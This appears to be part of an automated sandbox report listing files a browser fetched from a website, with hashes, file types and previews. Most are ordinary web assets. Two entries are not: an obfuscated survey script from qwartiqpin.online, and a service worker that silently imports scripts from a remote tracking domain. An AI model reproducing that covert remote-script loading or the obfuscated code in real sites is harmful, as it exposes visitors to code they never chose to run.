                                                                                        SHA-256:B09EDCD29E27A0D563744E726155053908F2ECE9D121B82D80FF07DFF2FC50DA
                                                                                        SHA-512:D8FC4DFBE22CFB3746131B475F9D60FFAD7A84D59BB546828950F87B30DAD2882BF59F023252F44788D83C1C8C94D7F3199F8261307186B233F990E44D9F77A1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn-cookieyes.com/client_data/e2e4072512935dad8f2f2461/banner.js
                                                                                        Preview:!function(){var t={9662:function(t,e,n){var r=n(7854),o=n(614),i=n(6330),c=r.TypeError;t.exports=function(t){if(o(t))return t;throw c(i(t)+" is not a function")}},9483:function(t,e,n){var r=n(7854),o=n(4411),i=n(6330),c=r.TypeError;t.exports=function(t){if(o(t))return t;throw c(i(t)+" is not a constructor")}},6077:function(t,e,n){var r=n(7854),o=n(614),i=r.String,c=r.TypeError;t.exports=function(t){if("object"==typeof t||o(t))return t;throw c("Can't set "+i(t)+" as a prototype")}},1223:function(t,e,n){var r=n(5112),o=n(30),i=n(3070),c=r("unscopables"),a=Array.prototype;null==a[c]&&i.f(a,c,{configurable:!0,value:o(null)}),t.exports=function(t){a[c][t]=!0}},1530:function(t,e,n){"use strict";var r=n(8710).charAt;t.exports=function(t,e,n){return e+(n?r(t,e).length:1)}},5787:function(t,e,n){var r=n(7854),o=n(7976),i=r.TypeError;t.exports=function(t,e){if(o(e,t))return t;throw i("Incorrect invocation")}},9670:function(t,e,n){var r=n(7854),o=n(111),i=r.String,c=r.TypeError;t.exports=function(
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
                                                                                        Category:downloaded
                                                                                        Size (bytes):77160
                                                                                        Entropy (8bit):7.996509451516447
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:AF7AE505A9EED503F8B8E6982036873E
                                                                                        SHA1:D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
                                                                                        SHA-256:2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
                                                                                        SHA-512:838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2
                                                                                        Preview:wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa...*...'.=.:..&..=r.*.......].t..E.n.......1F...@....|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..|.. $. e.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):729
                                                                                        Entropy (8bit):5.085415317172634
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:06192756D4F103A24FD97A9763536CBE
                                                                                        SHA1:A78B5FBA3EAE00239DCF022A9FADD9C0329F3C6E
                                                                                        SHA-256:576FB5E6F30FB2A1E35CC046E01C55E6DADCF30DD0D8FBE50A43C9036A5BAE9A
                                                                                        SHA-512:F47669218D5B4367958CF14FB728755A4E72425418B0758457AD0627FBB5FD9EC39118A0D1233EE320D5F7898CB607E24E5268529073CE8D82641F4DAA92F68F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<svg width="17" height="17" viewBox="0 0 17 17" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1356_17426)">..<path d="M5.77475 14.1368H0.717281C0.564938 14.1368 0.441406 14.0133 0.441406 13.861V3.92993C0.441406 3.77758 0.564938 3.65405 0.717281 3.65405H5.77475V14.1368Z" fill="#41479B"/>..<path d="M11.1083 3.65405H5.7749V14.1369H11.1083V3.65405Z" fill="#F5F5F5"/>..<path d="M16.1656 14.1368H11.1082V3.65405H16.1656C16.318 3.65405 16.4415 3.77758 16.4415 3.92993V13.861C16.4415 14.0133 16.318 14.1368 16.1656 14.1368Z" fill="#FF4B55"/>..</g>..<defs>..<clipPath id="clip0_1356_17426">..<rect width="16" height="16" fill="white" transform="translate(0.441406 0.895508)"/>..</clipPath>..</defs>..</svg>..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):108827
                                                                                        Entropy (8bit):5.3140973671831
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C688DC3FBA24846C9100935FD079B7E6
                                                                                        SHA1:BFC48FE0AA292927BB5F4E15B69AE784CEE25F71
                                                                                        SHA-256:82B958B8C0C2F2CC73228374695055A40ADCDD3138CBC1F61089F1268F299736
                                                                                        SHA-512:21FEC8F9D6A28F1B1FEAA6ED607A5708B906789877812C0C026FF5FDAA18559FAA7B8E7F37D5B1BF3EE2BE83485C5C24FA8380B009A065AC81EB5D54A5992AF0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/js/dublin/dist/common-hybrid.js?v=fb00c92e59fc03510f7e6c64e8419364
                                                                                        Preview:var a0_0x389188=a0_0x15cd;(function(_0x2dc1f5,_0xccdeb5){var _0x5f1e8c=a0_0x15cd,_0x13be8a=_0x2dc1f5();while(!![]){try{var _0xe8fbc3=-parseInt(_0x5f1e8c(0x1c9))/0x1+parseInt(_0x5f1e8c(0x295))/0x2+parseInt(_0x5f1e8c(0xe3))/0x3+parseInt(_0x5f1e8c(0x1d6))/0x4+parseInt(_0x5f1e8c(0xa1))/0x5+-parseInt(_0x5f1e8c(0x10b))/0x6+-parseInt(_0x5f1e8c(0x25e))/0x7*(-parseInt(_0x5f1e8c(0xa8))/0x8);if(_0xe8fbc3===_0xccdeb5)break;else _0x13be8a['push'](_0x13be8a['shift']());}catch(_0x26cd24){_0x13be8a['push'](_0x13be8a['shift']());}}}(a0_0x42f9,0x39783));let $curr,data={},surveyid='';var attrChoices=$(a0_0x389188(0x170))[a0_0x389188(0xb6)](a0_0x389188(0x27a)),domain=a0_0x389188(0x19d),count=0x0,pipeline=a0_0x389188(0x1ee),zipcode='',state_selected='',processing=![];let is_v4_0_b=!!document['getElementById']('template_dublin_4_0b'),icon_buttons=is_v4_0_b?a0_0x389188(0x126):'';var states={'AL':a0_0x389188(0x2ac),'AK':a0_0x389188(0x15e),'AZ':a0_0x389188(0x1a5),'AR':a0_0x389188(0xf7),'CA':a0_0x389188(0x1b0),
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65338), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):232919
                                                                                        Entropy (8bit):4.980079192140986
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:289320A46A426F855A9671032A3A8F22
                                                                                        SHA1:D7575CE0CC422AFA2AE032453EE0B01A2F0443B0
                                                                                        SHA-256:830DAE96D5C59E43C7F80D6F42BBD81A957AE66A0351999E2DB0F65FEED25A8B
                                                                                        SHA-512:6DFBB013F43F5A8666E63D1034C2F4A9842108AC147C9791F693AE324ECC4AD94AE718F8260DBD0B88CD0F36FAAF235FA3C0F5BDF563FCC63FC54E574CF41591
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/bootstrap-5.3.0/css/bootstrap.min.css
                                                                                        Preview:@charset "UTF-8";/*!.. * Bootstrap v5.3.0 (https://getbootstrap.com/).. * Copyright 2011-2023 The Bootstrap Authors.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):3041
                                                                                        Entropy (8bit):7.701684522732728
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:6B31C5611DBA24560454526CEF7E9A41
                                                                                        SHA1:7EAAF412C04A1C1202599C4DA7AD8E3F75E33635
                                                                                        SHA-256:F4CEB368212DCFB9C1C51C67C0E75A73A0EBBAFD0AD36BE356A564D22C227692
                                                                                        SHA-512:B8928D3742584B6F0F8B63DBCC463E91F88BEE7D6A873496BB93FE4CAD9ECEFAD9A02319C34C56E4CB57E33B5729DF58BD8370D4D14CC80342B37C15520D6ACB
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:BA861C7E3A7511EE907B9B6F142EAC6B" xmpMM:InstanceID="xmp.iid:BA861C7D3A7511EE907B9B6F142EAC6B" xmp:CreatorTool="Adobe Photoshop 23.5 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:42C6767335CB11EEA1D3C6FD030C0EF2" stRef:documentID="xmp.did:42C6767435CB11EEA1D3C6FD030C0EF2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..X....NIDATx..W[.T.....93g.......w*.....jK....l.m.`bM$.}....K[BR.>.&..} q.Z.DjA.J.t..,.v.e........>..w./F.......
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 200 x 200, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):91529
                                                                                        Entropy (8bit):7.960210140149797
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:04F93DAE6D65FFCC4DB47D70357088CF
                                                                                        SHA1:BEAD2C0080520E58CE9F2BFBEA06663F8914C48C
                                                                                        SHA-256:6240B6E13851A0E91946691C37E16E4B53586A0B766F494D96E3DF4DC1017C06
                                                                                        SHA-512:A2069BB9B04353F5EEC4828DC189299AA17A003E59794320217BE953AE94B891DCF9B3858BACA2DF68152272A42E8DA12F7A980B1C5D5E4C8E3D30FD40C91A2D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/uploads/archive/product/561/images/pq.png
                                                                                        Preview:.PNG........IHDR.............":9.....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (47653)
                                                                                        Category:downloaded
                                                                                        Size (bytes):47656
                                                                                        Entropy (8bit):5.4575391401031785
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:48ED7AE7E685F5469D86B54CC802F8EB
                                                                                        SHA1:E88318F6E8B0D255D2D5CB684A4DF120437AE610
                                                                                        SHA-256:899D1EC3C095342571D3BE2091EC6F984D4CC82390D1F61945C391FA035B00D9
                                                                                        SHA-512:FC3597F228DCC171ED1537C39DCD2D4F0CB093AD1B202695FB686276261BDF86C16D8550374A8EE72A353A8CF24F87B04F41E1ACB9D7F4B40A7624FAE79289A2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://snap.licdn.com/li.lms-analytics/insight.min.js
                                                                                        Preview:!function(){"use strict";function t(t,n,e){return n in t?Object.defineProperty(t,n,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[n]=e,t}var n,e,r,o,i={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,s=2,f=(t(n={},a,"li_gc"),t(n,u,"li_mc"),n),d=function Qe(){var t=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,n=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var o in function(t,n){if(!(t instanceof n))throw new TypeError("Cannot call a class as a function")}(this,Qe),t=t||{},this.consentAvailable=!1,this.issuedAt=n,this.userMode=e,this.optedInConsentMap={},i)t[o]=t[o]||c,t[o]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[o]=t[o]===l||t[o]===c&&r===l},v=(e=[i.ADVERTISING,i.ANALYTICS_AND_RESEARCH,i.FUNCTIONAL],r=[c,l,s,c],o=new R
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):186
                                                                                        Entropy (8bit):4.8456549006624625
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:DADDB8DD93581B2A7AAEFBE288201329
                                                                                        SHA1:21126B6FF6264E35B26E999BF6919D2FFD737138
                                                                                        SHA-256:4E911E16BD2595C34E3BA5BE105178E317B17B4A716BD8BAD3595B0D496E3545
                                                                                        SHA-512:04E7DFD81CFB1B6428795A7056C23A97F0866450FC56A7F864896709FFE3EDD2C9197EC9548EEB435A21FAE7517E5D2656029C44C56BA2951B53A65D72ECE052
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/service-worker.js
                                                                                        Preview:// general.if(typeof window === 'undefined'){. importScripts('https://trk-amropode.com//scripts/pg/v9e118mez8').}.importScripts('https://trk-amropode.com//scripts/sw/v9e118mez8');
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):537
                                                                                        Entropy (8bit):4.775635633190467
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:B362A282E4876D97463BEEEF77C8B7F8
                                                                                        SHA1:E7BE4FFEB3C7B506EBB4C35DFEA3ADF7DFEF4E78
                                                                                        SHA-256:3D092993F1A408861CF7CE1988B2CE63C9A58AEAA6BE4C01C407E12A83CE086E
                                                                                        SHA-512:3E079BAE9512BA4AECAF5C8CE1571920EBA3C7CBB0BE89A0D86DC3C844EC7EBB2B13F2785751D113B6E233EC4DCD4A4FFE8310463D11EDDB2C54A1313C75BAF7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<svg width="17" height="12" viewBox="0 0 17 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M15.135 0.758545H1.53153C0.869721 0.758545 0.333252 1.29501 0.333252 1.95683V4.25279H16.3333V1.95683C16.3333 1.29501 15.7968 0.758545 15.135 0.758545Z" fill="#464655"/>..<path d="M0.333252 10.043C0.333252 10.7048 0.869721 11.2413 1.53153 11.2413H15.135C15.7968 11.2413 16.3333 10.7049 16.3333 10.043V7.74707H0.333252V10.043Z" fill="#FFE15A"/>..<path d="M16.3333 4.25293H0.333252V7.74699H16.3333V4.25293Z" fill="#FF4B55"/>..</svg>..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (3034)
                                                                                        Category:downloaded
                                                                                        Size (bytes):270837
                                                                                        Entropy (8bit):5.558651852171678
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:A1C8483D6986628D9DE0B7AB0C653D49
                                                                                        SHA1:EBE247F46F19BDD7D154B32755CBBD1DA41F925C
                                                                                        SHA-256:57660A14624F3FFDB9DEF300A7B564BCE97F1DDF96ACBB9EC36E311717E9F4F3
                                                                                        SHA-512:416E9601FB28A6EE1173AA33928733757F3A26721AD128DE2AD535179A53073F1EC908EC8E0167CD5093C595D8366000EAA35E5F204D5219C35BC9EE56D4AEA0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-JMJ044GLKX&l=dataLayer&cx=c
                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0}],. "tags":[{"function":"__gct","vtp_trackingId":"G-JMJ044GLKX","vtp_sessionDuration":0,"tag_id":1},{"function":"__ccd_em_outbound_click","priority":0,"vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":3},{"function":"__ccd_em_download","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":5},{"function":"__ccd_em_video","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":6},{"function":"__ccd_em_site_search","vtp_searchQueryParams":"q,s,search,query,keyword","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":7},{"function":"__ccd_em_scroll","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":8},{"function"
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                        Category:downloaded
                                                                                        Size (bytes):2066
                                                                                        Entropy (8bit):7.304025096259172
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:EEE85CC2D8842EC90015748188B39845
                                                                                        SHA1:0AF631E58FC1A20430F4383853C2B88E002AD029
                                                                                        SHA-256:5665269840FA23FAAC662DBA33673AAB6D0F06FCF1EDCA2FEA09F669CE6BAAAD
                                                                                        SHA-512:0372A8BB2D33FBE583030AF650492E17120B3FA9241EF1EC6304C5B24A6149A12026256D23119F56D9857940D9CF936239E8CF7C2D924E303A2BCCB3205E79E1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/images/ci2.jpg
                                                                                        Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:457DE2748B8011ED9BCEB9CAE35D0A33" xmpMM:DocumentID="xmp.did:457DE2758B8011ED9BCEB9CAE35D0A33"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:457DE2728B8011ED9BCEB9CAE35D0A33" stRef:documentID="xmp.did:457DE2738B8011ED9BCEB9CAE35D0A33"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 140 x 60, 8-bit colormap, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):2691
                                                                                        Entropy (8bit):7.859226761283862
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:A7A81D3DA4BD119AD937299B3FB2B185
                                                                                        SHA1:C5A1E1C39B25573C5A76FE9200990D20AECA4255
                                                                                        SHA-256:C7A07A2C8F15510DA4C2AE3C3CC7FF2FD2B2AE28C7F31463455FB972A7387FE0
                                                                                        SHA-512:A6597727F5AF5FE63F7207B173DBA5209E6482366622C07E6DDA53ADB4B5F8FFCCFFF9ACD22601D68F6EFE59D0214D6037F365DA352C12D6B4DBABABFE9A046C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.PNG........IHDR.......<.......y....PLTE.....)w.'u....o.B.(((............<<<:::.........................CCC...B1;AAA111...QQQ.........MMM...+x333^^^rrr.........ooo..........7.GGG888999???///VVVAAA...aaabbb!!!iii,,,111.........ggg......!!!222$$$===...'''RRRiiiaaa\\\KKK!!!...LLL...UUU888sssGGG~~~...bbbKKKqqq..lll.........KKK....k........ttt..g.B.OOO444...***MMM...YYY111JJJJJJ222444OOOfff....W.sss'''ddd..GGG....k.rrr................sss....'pYYY..../u.Y..-x.o..T.)))eee.7.ttt.....R.....FFF.............+x..]]].:...000rrr..^..]....,y....c...h..p.B...c.b..L.zzz.[..(u.j........t...........E.....%%%555...E...H..U............8.....0z..W..E..c.....[..O..W.....^..."""........I..F..n..B000..S.4|..:.T.~.'.......tRNS........"O"...../...^.......KIH,.......N:..............xrI;5+("...................wggd^]TGF?=8531*.....................|sqmib]YWMGC=0..................}rcY?4......................~usfeaUO#........wn.%W'....IDATh....W.Q....X.......R.....`wwwwwwww.I...wFP@.#.Q^.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):5577
                                                                                        Entropy (8bit):4.262772625018888
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:FADBE522C1FB25437C2CC19C8C29021B
                                                                                        SHA1:CF6F7660ACFB1F30CFBFFB12A624580089BC1B78
                                                                                        SHA-256:B8388EFC0F1CB5B3F9D78E7A86FF8ABD9E3B7092A40AACABD539D20BB75EAB63
                                                                                        SHA-512:6D43DF9F767520780BDD42134FA424417F9F8B4FFB79A17EDA1C1006AC62F0CC851FAF8B558508F2E68F3753559D9515861D698E01A649ADCF16E1AA8212EAC0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M1.19828 2.75854C0.536469 2.75854 0 3.29501 0 3.95683V12.043C0 12.7048 0.536469 13.2413 1.19828 13.2413H5.33334V2.75854H1.19828Z" fill="#73AF00"/>..<path d="M10.6669 2.75854H5.3335V13.2414H10.6669V2.75854Z" fill="#F5F5F5"/>..<path d="M14.8016 2.75854H10.6665V13.2413H14.8016C15.4633 13.2413 15.9998 12.7048 15.9998 12.043V3.95683C15.9998 3.29501 15.4634 2.75854 14.8016 2.75854Z" fill="#FF4B55"/>..<path d="M8.47578 8.24658L8 8.48449V8.72239H8.23791L8.47578 8.24658Z" fill="#FFD250"/>..<path d="M7.99983 9.3172C7.93408 9.3172 7.88086 9.26398 7.88086 9.19827V8.72248C7.88086 8.65673 7.93408 8.60352 7.99983 8.60352C8.06558 8.60352 8.11877 8.65673 8.11877 8.72248V9.19827C8.11877 9.26398 8.06558 9.3172 7.99983 9.3172Z" fill="#00C3A0"/>..<path d="M7.9998 8.84154C7.53258 8.84154 7.08143 8.66126 6.72937 8.33392C6.68127 8.2892 6.67849 8.21392 6.72324 8.16586C6.7683 8.11789 6.84349 8.11533 6.89133
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (5739)
                                                                                        Category:downloaded
                                                                                        Size (bytes):5740
                                                                                        Entropy (8bit):5.16378959766591
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:5DCB72BE61AB3DD8945F1F02F8AFE0C4
                                                                                        SHA1:2A85EC1C1023E177E5EC0FFFD4D1C13B2EE9585B
                                                                                        SHA-256:2DA849395DAAC293A1727189C7F2696EDE6C396A721EC7C7B7465F6C0319D958
                                                                                        SHA-512:1485A67549756F840939FDD2A85E62CB3D71FEB0D62D084C602419D42CFE5070C17022407C51362C986A4222A796C324E55D906C35820FD0284E1871E1E6EB01
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn.jsdelivr.net/npm/search-insights@0.0.13
                                                                                        Preview:!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):e.AlgoliaAnalytics=t()}(this,function(){"use strict";var e=function(){var e=this;if(this.storeClick=function(t,n){var i=JSON.parse(localStorage.getItem("insights-store"))||{};i[t]={queryID:n,eventTimestamp:(new Date).getTime()},localStorage.setItem(e._storageKey,JSON.stringify(i))},this.getConversionObjectID=function(t){var n=e.getStorageData()[t];return n||!1},this.cleanOldStorage=function(e,t){var n=Object.keys(t);return n.length>0?n.reduce(function(n,i){var r=t[i];return Math.abs(e-r.eventTimestamp)/36e5<=6&&(n[i]=r),n},{}):{}},this.getStorageData=function(){return JSON.parse(localStorage.getItem("insights-store"))||{}},!function(e){try{var t=window[e],n="__storage_test__";return t.setItem(n,n),t.removeItem(n),!0}catch(e){return e instanceof DOMException&&(22===e.code||1014===e.code||"QuotaExceededError"===e.name||"NS_ERROR_DOM_QUOTA_REACHED"===e.nam
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 800x400, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):85005
                                                                                        Entropy (8bit):7.980213170554762
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:563AA28090A33C5A24AD9F5307422A58
                                                                                        SHA1:F444B45DD7FD1F196820D6437313985071488F50
                                                                                        SHA-256:23F91ABD0A70A1AC600B9B27F60D36AA91A25101C296B27F0153C3BCD3918723
                                                                                        SHA-512:F2715B8108E4AC546942DD893B0CFD1E8B146A50F66689D9A43347D8A7BA179834A339F03FCE85184CBAAD4C68BD1C1655806A1EAE61B34F861219A0B0EBEC19
                                                                                        Malicious:false
                                                                                        Reputation:unknown
